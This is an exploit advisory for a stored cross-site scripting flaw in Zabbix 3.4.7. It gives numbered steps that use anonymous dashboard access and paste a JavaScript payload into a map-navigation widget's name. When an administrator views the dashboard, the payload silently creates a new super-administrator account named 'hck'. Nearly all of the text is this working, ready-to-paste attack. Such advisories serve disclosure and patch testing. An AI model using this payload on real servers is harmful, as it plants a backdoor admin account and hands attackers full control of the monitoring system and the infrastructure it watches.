|===========================================================================
| # Exploit Title : Zabbix 3.4.7 - Stored Cross-Site Scripting (XSS)
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Vendor Homepage : https://www.zabbix.com/
|
| # Software Link : https://www.zabbix.com/rn/rn3.4.7
|
| # Tested on : [ Windows ~> 10 ]
|
| # Version : V 3.4.7
|
| # Date : 2021-04-06
|===========================================================================
| # Proof of Concept :
|
| 1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
| 2- Create new dashboard
| 3- Add a new widget => Type: Map nabigation tree
| 4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
| 5- Click to "Add" button
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================